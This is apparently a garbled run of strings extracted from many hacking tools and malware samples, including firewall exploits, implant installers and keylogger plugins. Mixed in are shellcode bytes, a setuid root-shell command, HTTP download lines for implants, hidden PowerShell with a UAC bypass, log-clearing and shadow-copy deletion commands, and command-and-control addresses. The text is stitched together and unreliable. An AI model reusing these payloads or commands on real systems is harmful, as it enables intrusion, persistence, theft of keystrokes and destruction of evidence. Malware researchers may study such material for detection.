openssl rsa -text 2> /dev/null')client_auth = binascii.hexlify(lo_execute('openssl rand 16'))[%.2u%.2u%.2u%.2u%.2u%.2u]0123456789abcdefABCEDF:A}%j,R
K4P%s: %s rpcprog=%d, rpcvers = %d/%d, proto=%s, wait.max=%d.%d, user.group=%s.%s builtin=%lx server=%s%s/%s: getsockname: %mABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/{}
print '  -s storebin  use storebin as the Store executable\\n'os.system('%s --file=\"%s\" --wipe > /dev/null' % (storebin, b))print '  -k keyfile   the key text file to inject'127.0.0.1 is not advisable as a source. Use -l 127.0.0.1 to override this warningiptables -%c OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;noclient: failed to execute %s: %ssh -c \"ping -c 2 %s; grep %s /proc/net/arp >/tmp/gx \"Attempting connection from 0.0.0.0:<pVt,<et(<st$<ct$<ntj
chown root:root /tmp/.scsi/dev/bin/gshchmod 4777 /tmp/.scsi/dev/bin/gsh_lib_version,%02d%03dTRANSITstorestr = 'echo -n \"%s\" | Store --nullterminate --file=\"%s\" --set=\"%s\"' % (nopenargs, outfile, VAR_NAME)The NOPEN-args provided are injected into infile if it is a valid -i                do not autokill after 5 hours__strtoll_internal__strtoul_internalEFDGHIJKLMNOPQRSUTG8HcJ HcF LcF0LcNGhHcJ0HcF@LcF0LcN8Hgetexecnameinvalid option `__fpstartGHFIJKLMNOPQRSTUVXWHTTP_REFERER=\"https://127.0.0.1:6655/cgi/redmin?op=cron&action=once\"exec /usr/share/redmin/cgi/redminop=cron&action=once&frame=cronOnceFrame&cronK=cronV&cronCommand=%2Ftmp%2Ftmpwatch&time=12%3A12+01%2F28%2F2005
1if [ -f /tmp/tmpwatch ] ; thenecho \"bailing. try a different name\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/%s,%s
readdir648
Missing argument for `-x'.
[-] Failed to mmap file: %s[!] Value has size of 0!forceprismheader[+] looking for vulnerable socketcan't use 32-bit exploit on 64-bit target[+] %s socket ready, exploiting...[!] nothing looks vulnerable, trying everythingkernel has 4G/4G split, not exploitable[+] kernel stack size is %d[-] Failed to Prepare Payload!ShellcodeStartOffset[*] Waiting for AuthCode from exploit[-] Connection closed by remote host (TCP Ack/Fin)[!]Warning: Error on first request - path size may actually be larger than indicated.<http://%s/%s> (Not <locktoken:write1>) <http://%s/>[+] Target is %s[-] Error appending shellcode buffer[-] Shellcode is too big[+] Exploit Payload Sent![+] Bound to Dimsvc, sending exploit request to opnum 29[+] Connected to target %s:%d[-] build_exploit_run_x64():[%s] - Error upgraded DLL architecture does not match target architecture (0x%x)[%s] - Error building DLL loading shellcode[+] Shellcode Callback %s:%d[+] Exploiting Target[+] Ping returned Target architecture: %s - XOR Key: 0x%08X[.] Sending shellcode to inject DLL[-] Error setting ShellcodeFile name[-] Unable to connect to broswer named pipe, target is NOT vulnerable[-] Unable to bind to Dimsvc RPC syntax, target is NOT vulnerable[+] Bound to Dimsvc, target IS vulnerable[+] Target is vulnerable to %d exploit%s[!] A vulnerable target will not respond.[-] Target NOT Vulernable[-] Touching the target failed![-] OS fingerprint not complete - 0x%08x![*] Failed to detect OS / Service Pack on %s:%d[*] SMB String: %s (%s)[-] Get RemoteMOFTriggerPath error[-] %s - Target might not be in a usable state.[*] Exploiting Target[-] Encoding Exploit Payload failed![-] The target is NOT vulnerable[+] The target IS VULNERABLE[-] Are you being redirectect? Need to retarget?[+] IIS Target OS: %s[*] Summary: %d pipes found[+] Testing %d pipes[-] Error on SMB startup, aborting92a761c29b946aa458876ff78375e0e28bc8acb0h
@@for /f \"delims=\" %%i in ('findstr /smc:\"%s\" *.msg') do if not \"%%MsgFile1%%\"==\"%%i\" del /f \"%%i\"Logging out of WebAdmin (as target account)[+] Connected to the Registry Servicef08d49ac41d1023d9d462d58af51414daff95a6a[+] CheckCredentials(): Checking to see if valid username/passwordError connecting to target, TbMakeSocket() %s:%d.NtErrorMoreProcessingRequiredCommand Format Error: Error=%xNtErrorPasswordRestriction
CM[+] Backdoor shellcode written[*] Attempting exploit method %dError: Could not calloc() for shellcode buffershellcodeSize: 0x%04X + 0x%04X + 0x%04X = 0x%04XGenerating shellcode([0-9a-zA-Z]+) OK LOGOUT completedError: Domino is not the expected version. (%s, %s)[-] Error: Exploit choice not supported for target OS!!Error: Target machine out of NPP memory (VERY BAD!!) - Backdoor removed[-] Error: Backdoor not present on target***********    TARGET ARCHITECTURE IS X64    ************[+] \"TargetPort\"      %hu---<<<  Complete  >>>---[+] \"NetworkTimeout\"  %huF
Restart with the new protocol, address, and port as target.TargetPort      : %s (%u)Error: strchr() could not find '@' in account name.TargetAcctPwd   : %sCreating CURL connection handle...[+] Setting password : (NULL)[-] TbBuffCpy() failed![+] SMB negotiation12345678-1234-ABCD-EF00-0123456789ABValue must end with 0000 (2 NULLs)[*] Configuring Payload[*] Connecting to listener
FLogon failed.  Kerberos ticket not yet valid (target and KDC times not synchronized)[-] Could not set \"CredentialType\"-xd = dump archive data & store in scancodes.txt-
-xta = same as -xt but show special chars & store in keys_all.txt.?AVFeFinallyFailure@@(
C:\\Projects\\GREATERDOCTOR\\trunk\\GREATERDOCTORsrc\\build\\Release\\dllConfig\\dllConfig.pdbGREATERDOCTOR [ commandline args configuration ]-useage: <scanner> \"<cmdline args>\"+daemon_version,system,processor,refid,clockUsage: %s typeofscan IP_address# scanning ip  %d.%d.%d.%d***** %s ***** (length %d)D$7P
D$>File too large!  Must be less than 655360 bytes.c:\\ntevt.pdbARASPVUAZAYAX_^]ZY[XH
H3Select * from Win32_Process\
Previous command: set injection processes (status=0x%x)Secondary injection process is <null> [no secondary process will be used]Enter the address to be used as the spoofed IP source address (xxx.xxx.xxx.xxx) -> E: Execute a Command on the ImplantFullThreadDump.classThreadMonitor.classDeadlock$DeadlockThread.class*
0M1U1Z1p1
_BzWKJD+D$ll
\$mD$Tc
D$ViD$\l
D$^* The target is IIS 6.0 but is not running content indexing servicess,--ver 6 --sp <service_pack> --lang <language> --attack shellcode_option[s]sLBy default, the shellcode will attempt to immediately connect s$UNEXPECTED SHELLCODE CONFIGURATION ERRORs
\\\\.\\%ls6\"6<6C6H6M6Z6f6t6Updates the name of the dll or executable in the resource file*NOTE: SetResourceName does not work with PeddleCheap versions2 = [appinit.dll] level4 dll1 = [spcss32.exe] level3 exehZwLoadDriver
3Select * from Win32_Shares
\\\\%ls\\%lsdumpel -f file [-s \\\\server]records will not appear in the dumped log.obj\\i386\\Dumpel.exeDUMPEL Usage:    wCw3wDwAw2wNw@wEwZw2wDwEwBwZwFwFw4w2wZw5w1w4wFwZwGwOwGwGwEw5w2wFwGwDwFwOww+w;w2w0w6w4w.w(wRw
\$`HE3
_PacketNDISRequestComplete@12\"_LDNdis5RegDeleteKeys@4
S-%u-%u$9e
D$D$NA
D$A3&3.3<3A3F3K3V3c3m3
running on this computer!- Promiscuous (capture all packets on the network)Active filter for the adapter:
EUSAGE: SetPorts <input file> <output file> <version> <port1> [port2] [port3] [port4] [port5]Valid versions are:  1 = PC 1.2   2 = PC 1.2 (24 hour)s
raw_open CreateFile error\
K%02u:%02u:%02u.%03u-%4u: * PrivateEncrypt -> PublicDecrypt FAILEDSELECT ProcessId,Description,ExecutablePath FROM Win32_Process~debl00l.tmp\\\\.\\mailslot\\c54321\\\\.\\mailslot\\c12345nowMutexSystem\\CurrentControlSet\\Services\\MSExchangeIS\\ParametersPrivate000000005017C31B7C7BCF97EC86019F5026BE85FD1FB192F6F4237B78DB12E7DFFB07748BFF6432B3870681D54BEF44077487044681FB94D17ED04217145B9800000000E2C9ADBD8F470C7320D28000353813757F58860E90207F8874D2EB49851D3D3115A210DA6475CCFC111DCC05E4910E50071975F61972DCE345E89D88USAGE: %s -i InputFile -o OutputFile [-f FunctionOrdinal] [-a FunctionArgument] [-t ThreadOption]The output payload \"%s\" has a size of %d-bytes.ERROR: fwrite(%s) failed on ucPayloadLoad and execute implant within the existing threaddriver startDeviceIoControl Error: %dPhlookUSAGE: SetOurAddr <input file> <output file> <protocol> [IP/IPX address]Replaced default IP address (127.0.0.1) with Local IP Address %d.%d.%d.%d\
hKeAddSystemServiceTablehPsDereferencePrimaryTokenC
sys\\mstcp32.dbg%
Usage: %s targetIP protocolSequence portNo [redirectorIP] [CLSID]key does not exist or pinging w2k systemRpcProxy=255.255.255.255:65536.dllfDKhsppxuD$8.exe\
-PATHDELETED-(
NULLFILENAMEUSAGE: %s <input file> <output file> <port1> [port2] [port3] [port4] [port5] [port6]You may enter between 1 and 6 ports to change the defaults.SPRQWVUsage: %s [d|e] session_key ciphertextwhere session_key and ciphertext are strings of hexd = decrypt mode, e = encrypt modeBad mode, should be 'd' or 'e'wshtcpip.WSHGetSocketInformation\\\\.\\%hs.?AVResultIp@Mini_Mcl_Cmd_NetConnections@@C
\$WD$mL
D$o* Encrypted log found.  An encryption key must be providedencryptionkey = e.g., \"00 11 22 33 44 55 66 77 88 99 aa bb cc dd ee ff\"Decrypting with key '%02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x'(
Causes: Firewall,Machine down,DCOM disabled\\not supported,etc.7\"7(7/7>7O7]7o7w7@P
363<3S3c3l3q3v3{33!3%3)3-3135393@5
0#0)0/050;0M0Y0h0|0PQRAPAQSTUVWARASATAUAVAWSQRUWVAWAVAUATASARAQAPiijymqpAWAVAUATASARAQIWARASATAUAVM
H3*NOTE: This version of SetCallback does not work with PeddleCheap versions priorUSAGE: SetCallback <input file> <output file>DFReader.exe logfile AESKey [-j] [-o outputfilename]Double Feature Target VersionDoubleFeature Process ID
Target is share nameCould not make UdpNetbios header -- bailingRequest non-NT session key* Listening Post DLL %s() returned error code %d.WsaErrorTooManyProcessesServerErrorBadNamePassword*
%s cm 10 2000 \"c:\\MY DIR\\myapp.exe\" c:\\MyResourceData.dat<PE path> - the path to the PE binary to which to add the resource.Unable to get path for target binary.Fragment: Packet too small to contain RPC headerFragment pickup: SmbNtReadX failedI
Probe #2 usage: %s -i TargetIp -p TargetPort -r %d [-o TimeOut] -t Protocol -n IMailUserName -a IMailPassword** RunExploit ** - EXCEPTION_EXECUTE_HANDLER : 0x%08XSending Implant Payload.. cEncImplantPayload size(%d)Target is NOT vulnerable** CreatePayload ** - EXCEPTION_EXECUTE_HANDLERSkip call to PackageRideArea().  Payload has already been packaged. Options -x and -q ignored.ERROR: pGvars->pIntRideAreaImplantPayload is NULLDEC Pathworks TCPIP service on Windows NT<\\\\__MSBROWSE__> G<IRISNAMESERVER>** SendAndReceive ** - EXCEPTION_EXECUTE_HANDLERBinding to RPC Interface %s over named pipeERROR: TbMalloc() failed for encoded exploit payload** EncodeExploitPayload ** - EXCEPTION_EXECUTE_HANDLERSending Implant Payload (%d-bytes)ERROR: Encoder failed on exploit payloadERROR: VulnerableOS() != RET_SUCCESSERROR: Connection terminated by Target (TCP Ack/Fin)Target did not respond within specified amount of time# Scan for windows boxesGoing into send# Does not workYou are the weakest link, goodbyerpc   Scan for RPC  folksp
cnFormSyncExFBCcnFormVoidFBC
yyyyyyyyyyyyyyyy?a73957838_2@@YAXXZ?a84884@@YAXXZ?b823838_9839@@YAXXZ?e747383_94@@YAXXZ?e83834@@YAXXZ?e929348_827@@YAXXZ7
StringIndexi
msvcp5%d.dllactxprxy.GetProxyDllInfoactxprxy.DllGetClassObjectactxprxy.DllRegisterServeractxprxy.DllUnregisterServeryyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy191H1a1November ababababababJanuary October September c:\\users\\rmgree5\\m
svrg.pdbW32pServiceTableIn formaReleaseFastMutexR0omp4arH.text\
GetMappedFilenameWALL_FIREWALLS@
Failed to get Windows versionl
\\\\%s\\mailslot\\%s%d-%d-%d %d:%d:%d Zlsasrv32.dll!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%s %02x %sVIEWERS5
x:\\fanny.bmpd:\\fanny.bmpc:\\windows\\system32\\kernel32.dllSystem\\CurrentControlSet\\Services\\USBSTOR\\EnumSystem\\CurrentControlSet\\Services\\PartMgr\\Enum\\AGENTCPD.DLLagentcpd.dllPADupdate.exedll_installer.dll\\restore\\Q:\\__?__.lnkSoftware\\Microsoft\\MSNetMng\\shelldoc.dllfile size = %d bytes\\MSAgentGlobal\\RPCMutexGlobal\\DirectMarketingnls_933w.dllB
KfAcquireSpinLockHAL.dllREAD_REGISTER_UCHAR@
$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaO
hnetcfg.HNetGetSharingServicesPagehnetcfg.IcfGetOperationalModehnetcfg.IcfGetDynamicFwPortshnetcfg.HNetFreeFirewallLoggingSettingshnetcfg.HNetGetShareAndBridgeSettingshnetcfg.HNetGetFirewallSettingsPagei386\\DesertWinterDriver.pdbPerforming UR-specific post-install...Timeout waiting for the \"canInstallNow\" event from the implant-specific EXE!STRAITSHOOTER30.exestandalonegrok_2.1.1.1M
p32.sysunilay.dllI
sys\\tdip.dbgdip.systdip.pdbm
msrstd.pdbm
Parmsndsrv.dbgm
\\systemroot\\C
volrec.pdbV
Backsnarf_AB25-C %s 127.0.0.1\" scripme -F -t JACKPOPIN4 '&Command too long!  What the HELL are you trying to do to me?!?!  Try one smaller than %d bozo.Error from ourtn, did not find keys=target in tn.spayedourtn -d -D %s -W 127.0.0.1:%d  -i %s -p %d %s %s#Provide hex or EP log as command-line argument or as inputprint \"Gimme hex: \";if ($line =~ /Reg_Dword:  (\\d\\d:\\d\\d:\\d\\d.\\d+ \\d+ - )?(\\S*)/) {if ($_ =~ /InstallDate/) {if (not($cmdInput)) {print \"$hex in decimal=$dec\\n\\n\";%s: abort.  Code is %d.  Message is '%s'%s: %li b (%li%%)no winsock%s: %s file '%s'peer: connectread: write%s: done!recv_ack: %s: Service not supplied by providersend_request: putmsg \"%s\": %sport undefinedrecv_ack: %s getmsg: %s>> %d -- %d%s [infile] [outfile] /k 0x[%i character hex key] </g>File %s already exists.  Overwrite? (y/n) Random Key : 0xdone (%i bytes written).%s --> %s...
load auxiliary object=%s requested by file=%ssize of new packet, should be %d <= size <= %d bytesverbosity - show lengths, packet dumps, etc%s: error while loading shared libraries: %s%s%s%s%scannot dynamically load executablebinding file %s to %s: %s symbol `%s' [%s]randomize the initiator cookieValid commands are: SMAC, DMAC, INT, PACK, DONE, GOinvalid format suggest DMAC=00:00:00:00:00:00SMAC=%02x:%02x:%02x:%02x:%02x:%02xNot everything is set yet%d - %d, %d%d - %lu.%lu %d.%lu%d - %d %d*** Target may be susceptible to FALSEMOREL      ****** Target is susceptible to FALSEMOREL          ***if (!(($srcip,$dstip,$srcport,$dstport) = ($line=~/^([a-f0-9]{8})([a-f0-9]{8})([a-f0-9]{4})([a-f0-9]{4})$/)))$ans=\"$srcip:$srcport -> $dstip:$dstport\";return \"ERROR:$line is not a valid port\";$dstport=hextoPort($dstport);sub hextoPort$byte_table{\"$chars[$sixteens]$chars[$ones]\"}=$i;return \"ERROR:$line is not a valid address\";print \"ERROR: the filename or hex representation needs to be one argument try using \\\"'s\\n\";push(@octets,$byte_table{$tempi});print hextoIP($ARGV[0]);Generates the persistence file name and prints it out.Name:   A hostname: 'host.network.com', a decimal numeric offset within-a www.badguy.net,CNAME,1800,host.badguy.net \\\\What is the name of your PBD:You are now ready for a ScreamPlowBinStore enabled implants.Active connections will be maintained for this tunnel. Timeout:%s: compatible with BLATSTING version 1.2can't find target version module!class Payload:Connection timed out. Only a problem if the callback was not received.Could not reliably detect cookie. Using 'session_id'...def build_exploit_payload(self,cmd=\"/tmp/httpd\"):self.build_exploit_payload(cmd).got_loader_start_textIMPLANTKEEPGOINGupgrade_implantUnable to save off predefinedScans directoryRe-orders the networkProfiler scans so they show up in order in the LPfailed to create version-specific payload(are you sure you did \"make [version]\" in versions?)-s/--srcip <sourceIP>  Use given source IP (if sniffer doesn't collect source IP)convert an XML file generated by the BLATSTING sniffer module into a pcap capture file.(might have to delete key in ~/.ssh/known_hosts on linux box)scp BGLEE-should be 4bfe94b1 for clean bootloader version 3.0; scp <configured implant> <username>@<IPaddr>:onfigERROR: failed to open %s: %d__libc_start_main@@GLIBC_2.0serial number: %sstrerror@@GLIBC_2.0ERROR: mmap failed: %dSD_processControlPacketEncryption_rc4SetKey^GET.*(?:/ |\\.(?:htm|asp|php)).*\\r\\nThis program will configure a JETPLOW Userarea file.Error running config_implant.NOTE:  IT ASSUMES YOU ARE OPERATING IN THE INSTALL/LP/JP DIRECTORY. THIS ASSUMPTION First IP address for beacon destination [127.0.0.1]Are you sure? Don't forget that NETSCREEN firewalls require BANANALIAR!! LOADEDpageTable.chandler_readBIOSmacdef init > /tmp/.netrc;/usr/bin/wget http://HOME=/tmp ftp >> /tmp/.netrc;/usr/rapidstream/bin/tftpcreated shell_command:rm -f /tmp/.netrc;echo quit >> /tmp/.netrc;echo binary >> /tmp/.netrc;chmod 600 /tmp/.netrc;created cli_command:firefox http://127.0.0.1:8000/$_nameWhat is the name of your implant:killall thttpdcopy http://<IP>:80/$_name flash:/$_nameexecute_post = '\\xe8\\x00\\x00\\x00\\x00\\x5d\\xbe\\xef\\xbe\\xad\\xde\\x89\\xf7\\x89\\xec\\x29\\xf4\\xb8\\x03\\x00\\x00\\x00tiny_exec = '\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00auth_id = '\\x31\\xc0\\xb0\\x03\\x31\\xdb\\x89\\xe1\\x31\\xd2\\xb6\\xf0\\xb2\\x0d\\xcd\\x80\\x3d\\xff\\xff\\xff\\xff\\x75\\x07
./epicbanana_2.0.0.1.py -t 127.0.0.1 --proto=ssh --username=cisco --password=cisco --target_vers=asa804 --mem=NA -p 22 -t TARGET_IP, --target_ip=TARGET_IP -- Either 127.0.0.1 or Win Ops IP./bride-1100 --lp 127.0.0.1 --implant 127.0.0.1 --sport RHP --dport RHP--target_vers=TARGET_VERS    target Pix version (pix712, asa804) (REQUIRED)-p DEST_PORT, --dest_port=DEST_PORT defaults: telnet=23, ssh=22 (optional) - Change to LOCAL redirect portthis operation is complete, BananaGlee willcd /current/bin/FW/BGXXXX/Install/LPprofProcessPacketgetTimeSlotCmdHandlergetIpIpCmdHandlerprofStartScantmpData.1resetCmdHandlercd /current/bin/FW/BANANAGLEE/$bgver/Install/LP/jetplow***** Please place your UA in /current/bin/FW/OPS *****ln -s ../jp/orig_code.bin orig_code_pixGen.bin*****             Welcome to JetPlow              *****get_lsl_interfacesencryptFC4Payloadbeacon_getconfigFormBeaconPacketbeacon_reconfiguredumpConfiggetstatusHandlerxtractdataTo disable password checking on target:[-] target is running[-] problem importing version-specific shellcode from[+] importing version-specific shellcode[-] unsupported target version, abortthe --spoof option requires 3 or 4 fields as follows redir_ip[-] timeout waiting for response - target may have crashed[-] no response from health check - target may have crashedmemset 00e9a05c 4 38845b88_hidecmdmemset 013abd04 1 0dCould not connect to target device: %s:%d. Please check IP address.command data size is invalid for an exec cmdA script was specified but target is not a PPC405-based NetScreen (NS5XT, NS25, and NS50). Executing scripts is supported but maExecute 0x%08x with args (%08x, %08x, %08x, %08x): [y/n]Execute 0x%08x with args (%08x, %08x, %08x): [y/n][%d] Execute code.Execute 0x%08x with args (%08x): [y/n]dump_value_LHASH_DOALL_ARGEggcode is complete. Pass execution to it? [y/n]required by SECONDDATEhelp='Output file name (optional). By default the resulting data is written to stdout.')data = '<html><body onload=\"location.reload(true)\"><iframe src=\"%s\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"version='%prog 1.0',usage='%prog [ ... options ... ] url',readFlashHandlerflashRtnsPix6x.cfix_ip_cksum_incrwriteFlashHandlerusage %s \"<tcpdump pcap string>\" <outfile>error reading dump file: %struncated dump file; tried to read %u captured bytes, only got %lu%s: link-layer type %d isn't supported in savefilesDLT %d is not one of the DLTs supported by this deviceUsage: StoreFc.py --configFile=<path to xml file> --implantFile=<path to BinStore implant> [--outputFile=<file to write the confraise Exception, \"Must supply both a config file and implant file.\"This is wrapper for Store.py that FELONYCROWBAR will use. Thisdef hexdump(x,lead=\"[+] \",out=sys.stdout):print >>out, \"%s%04x  \" % (lead,i),print >>out, \"%02X\" % ord(x[i+j]),print >>out, sane(x[i:i+16])Components/Modules/BiosModule/Implant/E28F6/../e28f640j3_asm.ScmosReadBytechecksumAreaConfirmed.0writeSpeedPlow.c--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s --lptimeout %u%s -c <cmdtype> -l <lp> -i <implant> -k <ikey> -s <port> -d <port> [operation] [options]* [%lu] 0x%x is marked as stateless (the module will be persisted without its configuration)%s version %s already has persistence installed. If you want to uninstall,The active module(s) on the target are not meant to be persistedLP.c:pixSecurity - Improper number of bytes read in Security/Interface InformationLP.c:pixSecurity - Not in SessiongetModInterface__preloadedModulesshowCommandsreadModuleInterfaceWrapping_Not_Necessary_Or_Wrapping_OkGet_CMD_ListLP_Listen2killCmdListModule and Implant versions do not match.  This module is not compatible with the target implant%s/BF_READ_%08x_%04d%02d%02d_%02d%02d%02d.log%s/BF_%04d%02d%02d.log%s/BF_READ_%08x_%04d%02d%02d_%02d%02d%02d.bin* Not attempting to execute \"%s\" commandTERMINATING SCRIPT (command error or \"quit\" encountered)execute code in <file> passing <argX> (HEX)* Use arrow keys to scroll through command historypitCmd_processCmdLineexecute all commands in <file>__processShellCmdpitTarget_getDstPort__processSetTargetIpLogging commands and output - ONThis command is too dangerous.  If you'd like to run it, contact the development teamImplant Version-Specific Values:This function should not be used with a Netscreen, something has gone horribly wrongcreateSendRecv: recv'd an error from the target.Error: WatchDogTimeout read returned %d instead of 4Command has not yet been codedBeacon Domain  : www.%s.comThis command can only be run on a PIX/ASAWarning! Bad or missing Flash values (in section 2 of .dat file)Printing the interface info and security levels. PIX ONLY.incomplete and must be removed manually.)%s: recv'd an error from the target.Unable to fetch the address to the get_uptime_secs function for this OS versionupload/activate/de-activate/remove/cmd function failedDo you wish to activate the implant that is already on the firewall? (y/n): There is no implant present on the firewall.Implant Version :%lx%lx%lxYou may now connect to the implant using the pbd idkeyNo reply from persistant back door.rm -rf pbd.wc; wc -c %s > pbd.wcPBD_GetVersionpbd/pbdEncrypt.binpbd/pbdGetVersion.pktpbd/pbdStartWrite.binpbd/pbd_setNewHookPt.pktpbd/pbd_Upload_SinglePkt.pktUnable to fetch hook and jmp addresses for this OS versionCould not get hook and jump addressesEnter the name of a clean implant binary (NOT an image):Unable to read dat file for OS version 0x%08lxInvalid implant fileprint \"[+] Connecting to %s:%s\" % (self.params.dst['ip'], self.params.dst['port'])@overridable(\"Must be overriden if the target will be touched.  Base implementation should not be called.\")@overridable(\"Must be overriden.  Base implementation should not be called.\")exp.load_vinfo()if not okay and self.terminateFlingOnException:print \"[-] keyboard interrupt before response received\"if self.terminateFlingOnException:print 'Debug info ','='*40Modules persistence file written successfullyModules persistence data successfully removedNo Modules are active on the firewall, nothing to persistError while attemping to persist modules:Error while reading interface info from PIXLP.c:pixFree - Failed to get responseWARNING: LP Timeout specified (%lu seconds) less than default (%u seconds).  Setting defaultUnable to fetch config address for this OS versionLP.c: interface information not available for this session[%s:%s:%d] ERROR: extract_fgbgWARNING:  Session may not have been closed!EXEC Packet ProcessedFailed to insert the command into command list.Send_Packet: Trying to send too much data.payloadLength >= MAX_ALLOW_SIZE.Wrong Payload SizeUnknown packet received......Returned eax = %08xlogging.error(\"       Perhaps you should run with --scan?\")logging.error(\"ERROR: No entry for ETag [%s] in %s.\" %\"be supplied\")received prompt, we're infailed to login, bad creds, abortsending command \" + str(n) + \"/\" + str(tot) + \", len \" + str(len(chunk) + received nat - EPBA: ok, payload: mangled, did not runno status returned from target, could be an exploit failure, or this is a version where we don't expect a stus returnreceived arp - EPBA: ok, payload: failchopped = string.rstrip(payload, \"\\x0a\")shstrtab
.textZXUR
30.40.50.60:9342|###[ SNMPresponse ]###[+] generating exploit for exec mode pass-disable[+] building payload for mode pass-disable[+] Executing:  extrabaconappended AAAADMINAUTH_ENABLE payload/BananaGlee/ELIGIBLEBOMBProtocol must be either http or https (Ex: https://1.2.3.4:1234)
+185.100.84.13458.49.58.58218.1.98.203187.33.33.8185.86.148.22745.32.129.18523.227.196.217p
<configFileName>20121_cmdDef.xml</configFileName><name>20121.dll</name><codebase>\"Reserved for future use.\"</codebase><plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS<platform type=\"1\"></plugin></pluginConfig><pluginConfig></platform></lpConfig><lpConfig>20123.dllk
IoFreeMdlKfReleaseSpinLock<shortDescription>Keystroke Collector</shortDescription>This plugin is the E_Qwerty Kernel Mode driver for logging keys.</description><commands/></version><associatedImplantId>20121</associatedImplantId><rightsRequired>System or Administrator (if Administrator, I think the DriverIns<platforms>Windows NT, Windows 2000, Windows XP (32/64 bit), Windows 2003 (32/64<projectpath>plugin/Collection</projectpath><dllDepend>None</dllDepend><minorType>0</minorType><pluginname>E_QwertyKM</pluginname></comments><comments><majorType>1</majorType><files>None</files><poc>Erebus</poc><team>None</team><?xml-stylesheet type=\"text/xsl\" href=\"../XSLT/pluginHTML.xsl\"?><pluginsDepend>U_HookManager v1.0, Kernel Covert Store v1.0</pluginsDepend><plugin id=\"20123\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsiWarriorPride\\production2.0\\package\\E_Wzowski<!-- edited with XMLSPY v5 rel. 4 U (http://www.xmlspy.com) by TEAM (RENEGADE) -<configFileName>20123_cmdDef.xml</configFileName><name>20123.sys</name><codebase>/bin/i686-pc-win32/debug</codebase>\
Failed to send the EQwerty_driverStatusCommand to the implant.-
The implant failed to return a valid status-
This PPC gets the current keystroke log.This command will add the given WindowTitle to the list of Windows to log keys fThis command will remove the WindowTitle corresponding to the given window titleThis command will return the current status of the Keyboard Logger (Whether it iThis command Toggles logging of all Keys. If allkeys is toggled all keystrokes w<definition>Turn logging of all keys on|off</definition><name>Get Keystroke Log</name><description>Keystroke Logger Lp Plugin</description><definition>display help for this function</definition>This command will switch ON Logging of keys. All keys taht are entered to a actiSet the log limit (in number of windows)<example>qwgetlog</example><aliasName>qwgetlog</aliasName><definition>The title of the Window whose keys you wish to Log once it becomes aThis command will switch OFF Logging of keys. No keystrokes will be captured<definition>The title of the Window whose keys you no longer whish to log</defin<command id=\"32\"><command id=\"3\"><command id=\"7\"><command id=\"1\"><command id=\"4\"><configFileName>20120_cmdDef.xml</configFileName><name>20120.dll</name><shortDescription>Keystroke Logger Plugin.</shortDescription><message>Failed to get File Time</message><description>Keystroke Logger Plugin.</description><message>Failed to set File Time</message></commands><commands><associatedImplantId>20120</associatedImplantId><message>No Comms. with Driver</message></error><message>Invalid File Size</message><platforms>Windows (User/Win32)</platforms><message>File Size Mismatch</message><projectpath>plugin/Utility</projectpath><pluginsDepend>None</pluginsDepend><pluginname>E_QwertyIM</pluginname><rightsRequired>None</rightsRequired><code>00001002</code><code>00001001</code>FqkVpTvBwTrhPFjfFF6ZQRK44hHl26
YdqrChZonUFE
DanderspritzDanderSpritzChimneyPool AddresGetting remote timeRETRIEVEDAdded Ops library to Python search pathtarget: z0.0.0.1Psp_AvoidancePasswordDumpInjectDllEventLogEditProcessModifyMcl_NtElevationMcl_NtNativeApiMcl_ThreatInjectMcl_NtMemoryvailablezSfouglr|||Command executed successfully\\Release\\Bot Fresh.pdbC
Bots\\Bot5\\x64\\ReleaseBot5\\Release\\Ism.pdbBot\\Release\\Ism.pdb\\Bot Fresh\\Release\\Bot/
raB3G:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:SaturdayS
F:\\Projects\\Bot\\Bot\\Release\\Ism.pdbC
powershell.exe -nologo -windowstyle hidden -c \"Set-ExecutionPolicy -scope currentuserpowershell.exe -c \"Set-ExecutionPolicy -scope currentuser -ExecutionPolicy unrestricted -f; . \"c:\\windows\\temp\\tmp8873taskkill /im winit.exe /finvoke-psuacme-method oobe -payload \"\"C
Invoke-bypassuacS
Microsoft\\Windows\\WinIt.exeMicrosoft\\Windows\\Tmp9932u1.bat\"cmd /u /c WMIC /Node:localhost /Namespace:\\\\root\\SecurityCentercmd /a /c net user administrator /domain >>cmd /a /c netstat -ant >>\"%localappdata%\\Microsoft\\========================== (Net User) ==========================j
D$$h6Q
@>process isn't exist<shell\\open\\command=\"System Volume Information\\USBGuard.exe\" installUser-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0webhp?rel=psy&hl=7&ai=
.?AVAgentKernel@@.?AVIAgentModule@@U
32.dadva
DispatchCommandDispatchEvent^
wevtutil clear-logvssadmin delete shadowsAGlobal\\23d1a259-88fa-41df-935f-cae523bab8e6Global\\07fd3ab3-0724-4cfd-8cc2-60c0e450bb9aWU3
>rkCYN
%ls_%ls_%ls_%d.~tmp
error 2005 recv from server UDP - %d\x0aerror 2004 send to TPS - %d\x0aerror 2003 recv from TPS - %d\x0aerror 2002 send to server UDP - %d\x0a
"JY8Aa
&%M/V;
EQW6SZ
?_5F}1
p#f"G7
,\9R`Ne
j{Wu/$
fC<XDw
cQwZR=
j#tC"(
Pnetids
ffffff
/zapoy/gate.php
fuckyou1xtool.exe\
